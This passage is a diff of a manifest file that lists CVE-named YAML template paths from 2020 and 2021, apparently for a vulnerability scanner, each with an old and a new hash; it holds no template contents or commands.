-http/cves/2020/CVE-2020-35749.yaml:8c7c7cb6375f279b172fd6db9e37182ff10b0d3d +http/cves/2020/CVE-2020-35749.yaml:071b5286eb814f3a58050ca297b0c84046044df1 http/cves/2020/CVE-2020-35774.yaml:04828fe9dc9b3cc64c404c9f22d4f2c4746cb04f http/cves/2020/CVE-2020-3580.yaml:d1950f88016803a9adf2de04b9f8d0d931fa1f12 -http/cves/2020/CVE-2020-35846.yaml:6b6789e6b946872f89459f2aa77c417067cfecb1 -http/cves/2020/CVE-2020-35847.yaml:c47e2427d3c1c33454343fd46d15ce6d27b767ff -http/cves/2020/CVE-2020-35848.yaml:27044a536ef83bb5fbac8083e22dc99e4f5be3a4 +http/cves/2020/CVE-2020-35846.yaml:a25c0fdcc92cfb3cf40904011f27ac7f99b1ad0d +http/cves/2020/CVE-2020-35847.yaml:07da3afa6cf5e3655caf39f9879f0387e40eec23 +http/cves/2020/CVE-2020-35848.yaml:f04f86c99c5997649d6f71415c4a05a7c689a62b http/cves/2020/CVE-2020-35951.yaml:8a82a09c399a210010151ef2b26290cb8b3c32dd http/cves/2020/CVE-2020-35984.yaml:73026939fceebcf822ec1708bc95bf679a9222c5 -http/cves/2020/CVE-2020-35985.yaml:a9ca41b022487d171f723c4aea91fbe6013875f6 -http/cves/2020/CVE-2020-35986.yaml:1ef91cc97a2ac750b377702b293d5f9218023ff0 +http/cves/2020/CVE-2020-35985.yaml:25d58bc63d2f6e70cdf0612c31bcd71a290f9364 +http/cves/2020/CVE-2020-35986.yaml:e42976bcb7af8a044fe11e1ea3e886126744e7a6 http/cves/2020/CVE-2020-35987.yaml:40f2fbbdfbf459fd19272719b14853a9a059b2df http/cves/2020/CVE-2020-36112.yaml:e52719830bf2eca68effb4397eadb8b8281338f3 -http/cves/2020/CVE-2020-36289.yaml:52f5ae4cb45c093b1f4d6e1dea3bd83cb716bb59 -http/cves/2020/CVE-2020-36365.yaml:b4678231c734f5b6508a8c3a65fc970b6e5b78b5 -http/cves/2020/CVE-2020-36510.yaml:43288de50cb0daa7560d3c49ab9cb662ec943aaa +http/cves/2020/CVE-2020-36289.yaml:09d3dc542482b576dcce44723ed042a87ce8e56b +http/cves/2020/CVE-2020-36365.yaml:5452168f24eef6bb11c0bf99e19b0941d22f6609 +http/cves/2020/CVE-2020-36510.yaml:a729adbc01e17fbf5771282c7db544252fdca1d3 http/cves/2020/CVE-2020-4463.yaml:644d422d8b7c29684081b2ba722c6c8c49dc82a2 http/cves/2020/CVE-2020-5191.yaml:9a3a930e48da4976766fbacc6722bb8b6c262c7a http/cves/2020/CVE-2020-5192.yaml:11f227839a3375c5d6e419bea5f60366f243ad94 -http/cves/2020/CVE-2020-5284.yaml:b6b8aea66dad94861b5d57694e171ae609077f96 +http/cves/2020/CVE-2020-5284.yaml:d649fe6e72511053e881be3d6f1598203d8e1f4b http/cves/2020/CVE-2020-5307.yaml:5f2c1c7f8182d01ef6c0cab9b090f901f4e91865 http/cves/2020/CVE-2020-5405.yaml:362a063401b8e384df88fcc1f958163e9d355922 http/cves/2020/CVE-2020-5410.yaml:15ef6b720233bda3b0a3bd22593417fa44f7cbc7 http/cves/2020/CVE-2020-5412.yaml:52fe5ee1514d295e0ed4f0e29db378764c447047 http/cves/2020/CVE-2020-5775.yaml:cbcbf5ab4ce79076fa4f024290982f26ab44323c -http/cves/2020/CVE-2020-5776.yaml:ddddb7cd7126aa41e107c0211722da5abebeb87f -http/cves/2020/CVE-2020-5777.yaml:414c353b95c77dcfe1220fd5926ec149093e59fa +http/cves/2020/CVE-2020-5776.yaml:37b1a85f99e4ce899518479a724c57263d4d1991 +http/cves/2020/CVE-2020-5777.yaml:b63aa31cc0d95030273f03b18a1fe55bb90b4ba4 http/cves/2020/CVE-2020-5847.yaml:8a1c0ba47de6c6cd63ede6605bd99f7f7d2bc88a -http/cves/2020/CVE-2020-5902.yaml:4bcd2da425ead756fa38a85226bd3b7109824dd5 +http/cves/2020/CVE-2020-5902.yaml:f9ccb5664ef63a869f8b66d0cf4afb3ed276eb03 http/cves/2020/CVE-2020-6171.yaml:7485379a4227df9a0668ace45ac89daeb1a1445c http/cves/2020/CVE-2020-6207.yaml:dc2081d146a83be2fdd12363e69d48540509dc98 http/cves/2020/CVE-2020-6287.yaml:5152426f4629703328b66fa272f3ca9137e59d5f http/cves/2020/CVE-2020-6308.yaml:662c78d7be59c6090f8ab983b9aecbe01757cae6 -http/cves/2020/CVE-2020-6637.yaml:c9a81cd46d9ac5a913e1ae089e5a06c613aadbd8 -http/cves/2020/CVE-2020-6950.yaml:a2f005a3cbbbf98b511f7581f8ba88e5401510aa -http/cves/2020/CVE-2020-7107.yaml:cc6dc47b28f17c25e1619ab5a3edbb4bfed3e8f3 +http/cves/2020/CVE-2020-6637.yaml:fba14d8647f45e33f8d36f5d1c1db8377c7400b2 +http/cves/2020/CVE-2020-6950.yaml:3fa4888fc069a5caeb65c70a99cdc10810e770c8 +http/cves/2020/CVE-2020-7107.yaml:a700703a34796a442c3de197203d6be12a7e0864 http/cves/2020/CVE-2020-7136.yaml:6e732e958094e4ad30bb994e7602c0cb2e04a1ca -http/cves/2020/CVE-2020-7209.yaml:0f6026d48cd89d6faa187af05d42c9518f7a48ae +http/cves/2020/CVE-2020-7209.yaml:ca6a479e80d5a57d81d6eab02ddd40d6adcbec3b http/cves/2020/CVE-2020-7318.yaml:4103c3864c23d3d6051a46a353c0a26f999c315d -http/cves/2020/CVE-2020-7796.yaml:2edde786f2b68cd2a253c24665496d6a985442fe +http/cves/2020/CVE-2020-7796.yaml:6cc8f8678bc010ebf48440d81d0abdf71663f8be http/cves/2020/CVE-2020-7943.yaml:8afe020a36b1eb69a2b2eb06c08f9f4cd0ca5ff2 -http/cves/2020/CVE-2020-7961.yaml:f7fba861921ab2e2a62af998de3cba8f5c270cc9 -http/cves/2020/CVE-2020-7980.yaml:6d32d0a0cbe584e4adb0d9e0638aa5c4e62f3ee3 -http/cves/2020/CVE-2020-8115.yaml:a04ebc2299d633d847a169d0b9c73e883cda8f80 +http/cves/2020/CVE-2020-7961.yaml:ab72f1bedfb82671b752867be3b31726e38645cc +http/cves/2020/CVE-2020-7980.yaml:2eb1cc78c20af5e24b2b86a0fc7af6b14b44c1a2 +http/cves/2020/CVE-2020-8115.yaml:a13dea3cecb85783d0a5b62323bd41d7831ee00c http/cves/2020/CVE-2020-8163.yaml:1d8b50738e8aa4b505e6dda88b20fa7716de3ee5 http/cves/2020/CVE-2020-8191.yaml:eb7ce1550e3c02349142058d5a0b9a713e810915 http/cves/2020/CVE-2020-8193.yaml:4284d6d0a6afaa9469244d30d5ff29ff306d8ce6 -http/cves/2020/CVE-2020-8194.yaml:1799ec8f9624c47809dedd73f5a2d22aaa20f638 +http/cves/2020/CVE-2020-8194.yaml:3abf9614723c76c7a160da2510737b930f065f33 http/cves/2020/CVE-2020-8209.yaml:d5a138aa97863d4074fe218b3049f7791fb81ab9 http/cves/2020/CVE-2020-8497.yaml:f1ae2ea882ecfe74d992711a94a9ab226dc34f2f -http/cves/2020/CVE-2020-8512.yaml:41b042b9085849f68752fdf0bbef458fb6e4c81b +http/cves/2020/CVE-2020-8512.yaml:d79f34d3f17b10ba6b21098aeb116269e5f5c053 http/cves/2020/CVE-2020-8515.yaml:9047b8393f7d8cc847713268690b7155b6508643 -http/cves/2020/CVE-2020-8615.yaml:28215d7bef64c613817859ffecc684925f025a6f +http/cves/2020/CVE-2020-8615.yaml:469dcf929c3a9b70bca8019a36d19c230be6b9ef http/cves/2020/CVE-2020-8641.yaml:b734674ab43e3bbdc7c4396851f425c9721f8362 http/cves/2020/CVE-2020-8644.yaml:442e833ef76b787a02a056b9de094015e0c57618 -http/cves/2020/CVE-2020-8654.yaml:86969023c0fb1d0f7e502880eb4ead28b3b5cd5d -http/cves/2020/CVE-2020-8771.yaml:fdbf80c1219ed77aa813cdea75224fc0e0437e11 +http/cves/2020/CVE-2020-8654.yaml:3749d3da6a2d2c75c50963fabdc71255179a1c2d +http/cves/2020/CVE-2020-8771.yaml:4754ef3c81ddc273334934a7251d7346b3317fc0 http/cves/2020/CVE-2020-8772.yaml:1c497ecdec6a48ebef0e1aef3571270c98b119d4 -http/cves/2020/CVE-2020-8813.yaml:a138cc708be6db87262901be29a348f42b8d0f2c +http/cves/2020/CVE-2020-8813.yaml:98c74694d8c400e0aab91434f845dc5fa633b687 http/cves/2020/CVE-2020-8982.yaml:2609994079bdeb1e72ba61248516e1d95f6258a6 http/cves/2020/CVE-2020-9036.yaml:c406a983523f91b2ef6adbec171216597d3e81bb http/cves/2020/CVE-2020-9043.yaml:849faa887c73b1638d4f68a403a21a320989a062 http/cves/2020/CVE-2020-9047.yaml:ef83a27c2edd3c2776b89c8bfdaec91d6e1ace59 -http/cves/2020/CVE-2020-9054.yaml:c9e18ac60edbecec09d912db77f833b45b70ed7c +http/cves/2020/CVE-2020-9054.yaml:9ad47329bd8c5963d9a3d1514732debefde17184 http/cves/2020/CVE-2020-9315.yaml:9c617983c07752889978bb310592e80738e185ec -http/cves/2020/CVE-2020-9344.yaml:7fdb85e16b94071d81a6cabe66028feddd357808 +http/cves/2020/CVE-2020-9344.yaml:2f25369c475255f13f89a8775e12006d3b6f6ba8 http/cves/2020/CVE-2020-9376.yaml:4ecda617567ce3ec2f2afd357739dd21f516b259 http/cves/2020/CVE-2020-9402.yaml:f03bf05b0f3b933accef4dcd7168f9129eadcfe2 http/cves/2020/CVE-2020-9425.yaml:a917fe2704478f54404b4a5a410ea249350516d1 http/cves/2020/CVE-2020-9483.yaml:b856b57a3c83f86b77fe655826d69410a2cff66c -http/cves/2020/CVE-2020-9484.yaml:1bf9ce4062ff0408e685129bb5903a20cb049cd9 -http/cves/2020/CVE-2020-9496.yaml:5d9976de5e0d435c44785ef10bd66ae8345c2fd1 -http/cves/2020/CVE-2020-9757.yaml:7b655f574386f646becd09992d9762d3d1323c19 -http/cves/2021/CVE-2021-1472.yaml:9667efe3cd6c38e1cca9cfbf5b6bdd476230fac6 +http/cves/2020/CVE-2020-9484.yaml:c795427074e9809a36ca8caa415e483a41ee6fc6 +http/cves/2020/CVE-2020-9496.yaml:e9a21a940edeba1e4776276f4c6e6f9527233b3f +http/cves/2020/CVE-2020-9757.yaml:9117b7af3d8ea83989841517c263d3304f746ea8 +http/cves/2021/CVE-2021-1472.yaml:9c0b6388d3d88f292da9910bc7c79f93fa3737c8 http/cves/2021/CVE-2021-1497.yaml:8e4e8691b05b2e3003f544dba1dd82e9d0469977 http/cves/2021/CVE-2021-1498.yaml:34f12d383bcd66e9c0b8abdb32af5eee246f0672 http/cves/2021/CVE-2021-1499.yaml:0d707d87542b57952d40f7c04fb7e9f3d049eddd @@ -1965,111 +1965,111 @@ http/cves/2021/CVE-2021-20031.yaml:8f171b51f07e049e29e708aba398ac1a5e9e0103 http/cves/2021/CVE-2021-20038.yaml:7167a6c38c9fde66a10e0146a4d0d470fa64c37f http/cves/2021/CVE-2021-20090.yaml:492bf1d4e71155f00ea4caff43a2ed3bd18991cf http/cves/2021/CVE-2021-20091.yaml:19f8133469d473c2292a69989c39c54a0cf87ed7 -http/cves/2021/CVE-2021-20092.yaml:cafad84bd12f41f09da4a823b1b68585a5e63051 +http/cves/2021/CVE-2021-20092.yaml:75518839ac66c0b8876df0a90fa658ee9645d7af http/cves/2021/CVE-2021-20114.yaml:36093947ca866a4627465d891f407337217f0806 -http/cves/2021/CVE-2021-20123.yaml:1827d563dfc7b91e266b8b1ddf901112f3926f78 -http/cves/2021/CVE-2021-20124.yaml:34e9e9a9175ea652c68cdf3046908f65db32b0c8 +http/cves/2021/CVE-2021-20123.yaml:06dd0a1336bfa9a0cc5b7a7cdbd8bb5eb16dee67 +http/cves/2021/CVE-2021-20124.yaml:8f6d64a97faf5bca8268c0cade785d4d21777423 http/cves/2021/CVE-2021-20137.yaml:ed26c4e766913416b746ce9120b823ac448731cb -http/cves/2021/CVE-2021-20150.yaml:7d165f05c8b0f913cf3a1088fc09bdbfc512503b -http/cves/2021/CVE-2021-20158.yaml:c648d25a1b384eaf49914ab6d128a647c7a8cc2f +http/cves/2021/CVE-2021-20150.yaml:f030b3aec588c3516fa85ea706e99828f0eb8ae3 +http/cves/2021/CVE-2021-20158.yaml:2df5bc58c8b70fb20fd2951c188cf2ae530ef447 http/cves/2021/CVE-2021-20167.yaml:36cc773bc72b6055133b65b2763ecd8bb5add28e -http/cves/2021/CVE-2021-20323.yaml:538208e51e77f582d55331ace479638d0655f3f0 +http/cves/2021/CVE-2021-20323.yaml:e2ae3ace91b06c28d15ae6b10e6b62901c7dc386 http/cves/2021/CVE-2021-20792.yaml:cd40a8ba02194765b10b24575346a4b375a4ad08 -http/cves/2021/CVE-2021-20837.yaml:85abbae82e8aa373f59622ed90dbf31a8e621de3 -http/cves/2021/CVE-2021-21087.yaml:574a986e6e401cc9348bc151d16178705b0baf8e +http/cves/2021/CVE-2021-20837.yaml:89fdd31c959b19c2ab1ad7155512d1f12116c318 +http/cves/2021/CVE-2021-21087.yaml:730233b4f2f47bfc53d70c12157c1bc3d92c5349 http/cves/2021/CVE-2021-21234.yaml:1de458d38a523fa3fa8fdb6e08aa4c53f341ce13 -http/cves/2021/CVE-2021-21287.yaml:9df66b2faeda2a1fb17e0492b028f737db95fc7c +http/cves/2021/CVE-2021-21287.yaml:26e7bb2a7bf595327e4d0c658a991b0c14676092 http/cves/2021/CVE-2021-21307.yaml:17e50a4be7be781682f5a2a575ea36ecf9d751a1 -http/cves/2021/CVE-2021-21311.yaml:3c4d566dd7839f49e4166877280a90a0ae6e21f2 +http/cves/2021/CVE-2021-21311.yaml:789dfa603ac943d8f44425a2bf1e11bdc8691254 http/cves/2021/CVE-2021-21315.yaml:70406f1f801ca874413f322d2961c79a8754fb7f http/cves/2021/CVE-2021-21345.yaml:512607ead259d98de98ba7711800d5198a0aa819 http/cves/2021/CVE-2021-21351.yaml:a9ff2618269205226e66ebb73a3b38b61c5c9007 http/cves/2021/CVE-2021-21389.yaml:7a7bf10e2505418f11e6cc1759c83079f3b22e32 -http/cves/2021/CVE-2021-21402.yaml:c52caaadc4b083d16b32313b3a4582bd41fbaf98 +http/cves/2021/CVE-2021-21402.yaml:2bb03c14610bff9ba5bd12c08a0f8e3272a5d84b http/cves/2021/CVE-2021-21479.yaml:6576b05e5abc8d3992d561c5217251883e27d8ca http/cves/2021/CVE-2021-21745.yaml:6222c9d2c8645ffaa32de1c39028a28bcd183082 -http/cves/2021/CVE-2021-21799.yaml:2f171a650be13baf18cfbd8a4c8b5e961827aa40 -http/cves/2021/CVE-2021-21800.yaml:1638be9a18b94b9eb05132143635b4668ff605c8 +http/cves/2021/CVE-2021-21799.yaml:810261a9f3c52f574d459fdb0bcac58ac6c2e4ad +http/cves/2021/CVE-2021-21800.yaml:501d15da7f262c1fd1b2f0008e9bc5376cac14ca http/cves/2021/CVE-2021-21801.yaml:c6c41e47254da5e398bb75f06d9f4c3400ca01a0 http/cves/2021/CVE-2021-21802.yaml:c13ebeb4d41efc30f7e13bb5c0f1b4b1b469b79f http/cves/2021/CVE-2021-21803.yaml:84f1528add8b6ffdf91ca8ef5227452f6a37cd77 -http/cves/2021/CVE-2021-21805.yaml:318c8cad7f9b3d3464160f435c5dda2a0b85867e +http/cves/2021/CVE-2021-21805.yaml:f17ac8d9506bd1afb7b4f33d159f370dbc1011d4 http/cves/2021/CVE-2021-21816.yaml:520bc9b9b2480f3d3745af02a4a646d3cc95a1bb http/cves/2021/CVE-2021-21881.yaml:314c6a82741362db622de79002bdaaa699d77761 http/cves/2021/CVE-2021-21972.yaml:3cb1d3e5a750dee527ad05a5dde9606adf3534da http/cves/2021/CVE-2021-21973.yaml:853e9759bf3850a3c10bf2d32c0817837c5a9296 http/cves/2021/CVE-2021-21975.yaml:7f5af74dfddf9aad00a337757a5d13c48d2e32a5 http/cves/2021/CVE-2021-21978.yaml:8aabff2e16d6c1a606f7a8131f8c9c4156885355 -http/cves/2021/CVE-2021-21985.yaml:de275a6d1f73b71650461305255ce4033fb0f6c3 +http/cves/2021/CVE-2021-21985.yaml:1b01b7d2eeb833de2019b94a5193800fb44cbb7f http/cves/2021/CVE-2021-22005.yaml:5b561670c55077e8de9fd19c0beb7e5fdb803f4a http/cves/2021/CVE-2021-22053.yaml:fbe006fbc8394b6eacee6ad237dd73da0fb449c4 -http/cves/2021/CVE-2021-22054.yaml:c2de346923e112220a96eef52ac3ce54cea959e2 -http/cves/2021/CVE-2021-22122.yaml:afd75a3aea95f2f896b818a8951db13d1553d6dd +http/cves/2021/CVE-2021-22054.yaml:fd67242fd059c9b31bae8d702893caddb3f91a9b +http/cves/2021/CVE-2021-22122.yaml:770a2d406bdd02eef5b8ba737bdcafbac0aab2d4 http/cves/2021/CVE-2021-22145.yaml:50c53aa0ad8179ca5c6a3ceca5ee45f75fc39edb -http/cves/2021/CVE-2021-22205.yaml:295d8f8b8991463618ae9b0649beee9bf60ce891 -http/cves/2021/CVE-2021-22214.yaml:9be0feb3e7d8d70731697b55e60e03991b023bee -http/cves/2021/CVE-2021-22502.yaml:0222d90f5cb9381a29406ba64373c7a401ddaf0f -http/cves/2021/CVE-2021-22707.yaml:285a3fb865a0f34788b7c98c5d0b0499fff4324b -http/cves/2021/CVE-2021-22873.yaml:37afc9d05370d6c092d337a0f241485d7780401e -http/cves/2021/CVE-2021-22911.yaml:8f4b010e1332d5eb900a0baa745f9364f8f56b31 +http/cves/2021/CVE-2021-22205.yaml:fb8b6024baefc58a240b46dbc10d5326781d8c80 +http/cves/2021/CVE-2021-22214.yaml:8f12396f57a9d9a68f4a63d08cc05069bc605d51 +http/cves/2021/CVE-2021-22502.yaml:4d61b26a32f0cd9ccece3c2c973bdd4c8c7a5bd0 +http/cves/2021/CVE-2021-22707.yaml:70726c2fcab39ba4e4adebab8e5a21f3af923542 +http/cves/2021/CVE-2021-22873.yaml:3c03414f0a25645f6ff5f411d632d370493abc74 +http/cves/2021/CVE-2021-22911.yaml:bd1fe40a8f4465309c6f59d1f29b96c484ad62df http/cves/2021/CVE-2021-22986.yaml:1076ec3050b272555fa680391c910a752b03e68a http/cves/2021/CVE-2021-23241.yaml:e1888868bf2770805a3f0cb3cae6820883bf9754 http/cves/2021/CVE-2021-24145.yaml:354af1a704e593bb9efc889f47ce82d30177f92f http/cves/2021/CVE-2021-24146.yaml:30f30afaad0e48ad7394e8f3bc658e3c52ea375d http/cves/2021/CVE-2021-24150.yaml:bc46ae35079f405b539824e978457a5726b272ed -http/cves/2021/CVE-2021-24155.yaml:fc725c5de1693bf4594d37b2b83d936127f2ff94 -http/cves/2021/CVE-2021-24165.yaml:27cba6c56a98cbdc748f6814224c197878411fc3 +http/cves/2021/CVE-2021-24155.yaml:5645db99f6ff5a09395211672d724153f406e85b +http/cves/2021/CVE-2021-24165.yaml:a251469d2e8aa3e9332ba32a8eb8c107b7c64df2 http/cves/2021/CVE-2021-24169.yaml:c21c1c72a9513ec661cf3d6c7934301e52d2940d -http/cves/2021/CVE-2021-24176.yaml:08064c398c90c5743dcd737492b44532ad8ae609 +http/cves/2021/CVE-2021-24176.yaml:57aa03d9b3ff5dfc7582e3e6e645dd40dba972a7 http/cves/2021/CVE-2021-24210.yaml:f3c92e19e3e4ecb701c23031ba681bc0bebbed93 -http/cves/2021/CVE-2021-24214.yaml:d6c9b3efb19f79dfa006ddc0776948c0b0456ba4 -http/cves/2021/CVE-2021-24215.yaml:a3f345d9b35b7e5ffb2bac0cf3d59a9e1a53b03a -http/cves/2021/CVE-2021-24226.yaml:e3cce68f878058a5b883337446b715c4638ea5b2 +http/cves/2021/CVE-2021-24214.yaml:fe5a4f0989cbfbaed4f7785c9b7dd6a903427bfa +http/cves/2021/CVE-2021-24215.yaml:53045db44ec88c402e16df51283414b4d3a46cb1 +http/cves/2021/CVE-2021-24226.yaml:4efb3c070813905d4b06f467f0709c1f9cfea511 http/cves/2021/CVE-2021-24227.yaml:8fc4d2d5ed2eb9d6cfe65a19a96d237f7ffab7c5 http/cves/2021/CVE-2021-24235.yaml:b292ae465be4b68e60b77f72a57ccc8563ebf31b http/cves/2021/CVE-2021-24236.yaml:b23f084964832d51ab3f4af593232ecdde5e6586 http/cves/2021/CVE-2021-24237.yaml:0d3ee3780923885ddc6cffc545df05ff9b5004bd -http/cves/2021/CVE-2021-24239.yaml:a8d97d308ddfbcf213d28485265edcaca9429149 -http/cves/2021/CVE-2021-24245.yaml:7bb1fc8f1f066614f4acc1287336318999c2b9ab +http/cves/2021/CVE-2021-24239.yaml:b0cc8c039ece07d6a3ac4a6f2464d0c22b57f6d1 +http/cves/2021/CVE-2021-24245.yaml:d1c7c3bf50ad2c2addef9f96df281c9bc2900f67 http/cves/2021/CVE-2021-24274.yaml:fdc8b3c848faeec90768ba04b9afd444ada6ed29 -http/cves/2021/CVE-2021-24275.yaml:699ee68f24f9120d66a588ba7d98403ae1bec79f -http/cves/2021/CVE-2021-24276.yaml:6d529d93b95d236e4d67e627f628dfc100a385d2 +http/cves/2021/CVE-2021-24275.yaml:6c6a3770c4fc8bebdc3a70c1577a8b9cdd641c58 +http/cves/2021/CVE-2021-24276.yaml:afb8ce90ecfaa0e422d14c34849b5be1d89bd0bf http/cves/2021/CVE-2021-24278.yaml:0b2dc1146c6f6e6e271dc39b3f043f9c68eb69a4 -http/cves/2021/CVE-2021-24284.yaml:8e0a2d867fefe5278478906204c54407d2c52981 +http/cves/2021/CVE-2021-24284.yaml:4d005ae351ac988b0dabdd7ba7ce112a7d2a400f http/cves/2021/CVE-2021-24285.yaml:92ccc610fac04483e22bf7475143c25140218d39 http/cves/2021/CVE-2021-24286.yaml:4fc77bc8752808ae5219d482ff86de500e673399 http/cves/2021/CVE-2021-24287.yaml:301c22e8fc62be986b55d8c632c971ada3634f04 http/cves/2021/CVE-2021-24288.yaml:906f67ef2610bde07a1372beec43f666d94e7646 -http/cves/2021/CVE-2021-24291.yaml:989514beb32327a90f746f0b5a5cc7d37ab875ca -http/cves/2021/CVE-2021-24298.yaml:ed0a99a0ae34549d1ba0cc1d1fc655a059ed6085 +http/cves/2021/CVE-2021-24291.yaml:fd532bc987e02fcc2a187ad4266d910b87389981 +http/cves/2021/CVE-2021-24298.yaml:1c02c80458f6f8a16841c7c774c2a07b5d2dd186 http/cves/2021/CVE-2021-24300.yaml:4e5f08f42588d8fc55a23ae949d761e9e9297f12 http/cves/2021/CVE-2021-24316.yaml:4f664d0815cacf39455233fb049ba50fdab01c16 -http/cves/2021/CVE-2021-24320.yaml:bc1eb935a0f20a1d22bc2a6a0c120bfb9aca7f4b -http/cves/2021/CVE-2021-24335.yaml:7e6548d5b8fd76c6cf9ebb4af47dd7f563999e1a -http/cves/2021/CVE-2021-24340.yaml:45660d1227d8734c582cb7b1b79671940f80f45c -http/cves/2021/CVE-2021-24342.yaml:45cf70e75e4e37166296cc7d2db4eee6b266a111 +http/cves/2021/CVE-2021-24320.yaml:9dafc796b3510ad1552851e657db09861c8bee92 +http/cves/2021/CVE-2021-24335.yaml:be3166a127fe3d9d9bfebcd4f4030bd692443efd +http/cves/2021/CVE-2021-24340.yaml:bb330b5e7346d2ebe8673b5e40567f5250057a48 +http/cves/2021/CVE-2021-24342.yaml:fa1849c17234768aeea039427eef631fe408f0d1 http/cves/2021/CVE-2021-24347.yaml:6c90d296d8416631ebaf7ece4b121eaf79c098e6 http/cves/2021/CVE-2021-24351.yaml:10a1c630459cf99435e71b00505c5f64595ed030 http/cves/2021/CVE-2021-24358.yaml:c7df8e26c19cfe2aa54d24d3fa8455d52b1698a1 -http/cves/2021/CVE-2021-24364.yaml:462271144765c14ca8788b33496a643d7ff7dcf3 +http/cves/2021/CVE-2021-24364.yaml:08a1345143718817545b4abe60635d5630a0c956 http/cves/2021/CVE-2021-24370.yaml:480c194476d40e71e0f58139dbac79cfcca559ba -http/cves/2021/CVE-2021-24387.yaml:9d10f02a47e4a06f90f4f06a24f24e6177b962ec +http/cves/2021/CVE-2021-24387.yaml:8bf0dbde8e34c930d2e2c2c10ec346cece322042 http/cves/2021/CVE-2021-24389.yaml:42ad59611f74158ae872570a997c48530f1b987f http/cves/2021/CVE-2021-24406.yaml:619168311788c421c9975c3b5285c06ade2c2dd7 -http/cves/2021/CVE-2021-24407.yaml:1f40116c29a201347b75897f4ae36497de80c72a -http/cves/2021/CVE-2021-24409.yaml:d8e98773b4f78f847f8674f8fa150aa3d7534b1a +http/cves/2021/CVE-2021-24407.yaml:db40b2349077bceb7bc32089a660352fa44195b9 +http/cves/2021/CVE-2021-24409.yaml:ed9d3235d3ddf23abc8e23c64729c028bad3322c http/cves/2021/CVE-2021-24435.yaml:c2ec5e562bcc640a38deddebca4c7164b15f81bd http/cves/2021/CVE-2021-24436.yaml:602fa742a1830cb1f39707d935e978c4af32b0f6 -http/cves/2021/CVE-2021-24442.yaml:7e8e7ad39204adda8b6f027bd02c53354b19e5f5 +http/cves/2021/CVE-2021-24442.yaml:6459ff5b29d79cd08ba6cac17f5311d4068c919a http/cves/2021/CVE-2021-24452.yaml:83b001cad29a915b555b4ffc9e04f33a8e80637a -http/cves/2021/CVE-2021-24472.yaml:3c66ca8a367f6de92c875e08f5208b2c7680fddb +http/cves/2021/CVE-2021-24472.yaml:654cbf9327ca455c2a5862e23b7018b2602c6e62 http/cves/2021/CVE-2021-24488.yaml:f3a1efac3aee6f4c0a616e2c24eb9b422c05f159 http/cves/2021/CVE-2021-24495.yaml:f4ecb1cb80b358b63faff083eccb92434ff2e6b9 http/cves/2021/CVE-2021-24498.yaml:2dab1759f9177c9b511cc29caefbff8a3e30778f http/cves/2021/CVE-2021-24499.yaml:479ae56097144603aa0ac425b482797071c148a0 http/cves/2021/CVE-2021-24510.yaml:1e931f035d2345ecff4c534cfcef28fae8345c1d http/cves/2021/CVE-2021-24554.yaml:e8341b35b6ad3ccd1b33edbffe1f61b464d6700d -http/cves/2021/CVE-2021-24627.yaml:57a1f4e2838721822caa3e97c15ad08a96ff52c0 +http/cves/2021/CVE-2021-24627.yaml:eb7178b5973b0b80b05a8021e420433428fe5664 http/cves/2021/CVE-2021-24647.yaml:18c9d01f297fb0807334189d6e0c67dc881f6026 http/cves/2021/CVE-2021-24666.yaml:a25e0c97cdff1a1e807b28a99a00ef033722a6ac http/cves/2021/CVE-2021-24731.yaml:6d56d8b4ce11d8c5416a2dc8a8ec0557b507e515 @@ -2077,38 +2077,38 @@ http/cves/2021/CVE-2021-24746.yaml:aaf375e2396c121de2a64543991c8850586bd8b4 http/cves/2021/CVE-2021-24750.yaml:33880dabf05f52290bc3bdf6ef6a71dbccbe0005 http/cves/2021/CVE-2021-24762.yaml:33c2e8efc337a1f06768b1e6047d6a02c32e9e8a http/cves/2021/CVE-2021-24791.yaml:483a228643827bac8b87d83b78865d8f395bfd39 -http/cves/2021/CVE-2021-24827.yaml:61c481595a7dabb304fd1c0cec9c7cd6a6a39684 +http/cves/2021/CVE-2021-24827.yaml:c975ee107fff6c87a105398623a2a2efc3ca1c26 http/cves/2021/CVE-2021-24838.yaml:b0bc77f4126c393b78150ec6e3e6d3840c40a071 -http/cves/2021/CVE-2021-24849.yaml:bdfba047b022ac2a4e0168aae16ab6a5272c50de +http/cves/2021/CVE-2021-24849.yaml:7b94e7f4a138fba106ba20a6c7ee138bea2da37c http/cves/2021/CVE-2021-24862.yaml:78adc2493ed043de4466a990011b3bc4f7c88fe6 http/cves/2021/CVE-2021-24875.yaml:78d31d54bfac674a34ecad0bbd7024aeb87c765c -http/cves/2021/CVE-2021-24891.yaml:664dffc5d4763e105b1438debac4ced927c4d6ae +http/cves/2021/CVE-2021-24891.yaml:eb99b2eef9374403d175172cc2c510035e765653 http/cves/2021/CVE-2021-24910.yaml:578aae9854f832a8e526a7a07c7d9b1557949de3 -http/cves/2021/CVE-2021-24915.yaml:eb590415fa429797c7dc89516bc0261e38dc7f5b +http/cves/2021/CVE-2021-24915.yaml:f172d25495f925b1584e57635e9fdf509ac07c6e http/cves/2021/CVE-2021-24917.yaml:c266a0fdaa11d4845b599de67c8a7943380fa539 http/cves/2021/CVE-2021-24926.yaml:10bf105c8ef639ba7fc985d7954915b69c33c4b1 http/cves/2021/CVE-2021-24931.yaml:fee82426c5f1a5cbeb6c269ab91086e1026d14f6 http/cves/2021/CVE-2021-24940.yaml:0481cbee1ce19ae7674a23128f0e1925164db6a7 -http/cves/2021/CVE-2021-24943.yaml:c8f138cd6d60951efb0adc150ed32d1daa789881 +http/cves/2021/CVE-2021-24943.yaml:93a210391c6908d475e434c178a1cc8e0c82cd6d http/cves/2021/CVE-2021-24946.yaml:5f09eec0c936dce40c7b346e73d3ab1e555b8026 http/cves/2021/CVE-2021-24947.yaml:f91652cde78faaf0de5409ca19253ddd1ad4f11b http/cves/2021/CVE-2021-24956.yaml:3d8d0c0a4088c26ef4d5637c6e9f67b19539cb01 http/cves/2021/CVE-2021-24970.yaml:fe2f26a13278d271e48a316d9826bf197e66d730 -http/cves/2021/CVE-2021-24979.yaml:7f132c8ef8c2fb055cdfd9265496a4ac0871f79f +http/cves/2021/CVE-2021-24979.yaml:2dcd72ccf920004757c807bf57b2012b9589ef38 http/cves/2021/CVE-2021-24987.yaml:06ec87f0d9dad1a08870b903b897645a4114cca6 http/cves/2021/CVE-2021-24991.yaml:4bc4eec76c21b3f68454f49c72adff65d3a817b5 -http/cves/2021/CVE-2021-24997.yaml:1824a3b9d5a403431c731e636e0365e882b2e145 +http/cves/2021/CVE-2021-24997.yaml:570633d39e265ed69286a27f334de11570eae432 http/cves/2021/CVE-2021-25003.yaml:f85acfb13bf701684d4fe91b81e2217b30c9eb94 